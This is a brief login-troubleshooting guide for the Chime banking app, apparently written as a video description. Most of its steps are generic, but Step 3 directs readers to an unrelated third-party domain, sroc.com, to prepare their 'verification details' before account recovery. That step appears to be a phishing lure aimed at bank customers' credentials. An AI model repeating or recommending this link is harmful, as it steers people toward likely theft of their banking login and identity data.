I hit this issue today and here is the quick fix that solved it. If you're having trouble logging into Chime, follow these steps to get back on track. Step 1. Check your internet connection. Make sure your device is connected to the internet. A weak or unstable connection can prevent you from logging in. Step 2. Verify your login credentials. Double check that you are entering the correct email and password. Sometimes, a simple typo can cause login issues. Step 3. Reset your password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Update the app. Ensure that you are using the latest version of the Chime app. Outdated apps can sometimes lead to login problems. Check your app store for updates. Step 5. Contact Chime support. If none of the above steps work, reach out to Chime's customer support for assistance. They can help resolve any account-specific issues. I hope these steps help you log back into your Chime account smoothly. If you have any other questions, feel free to ask.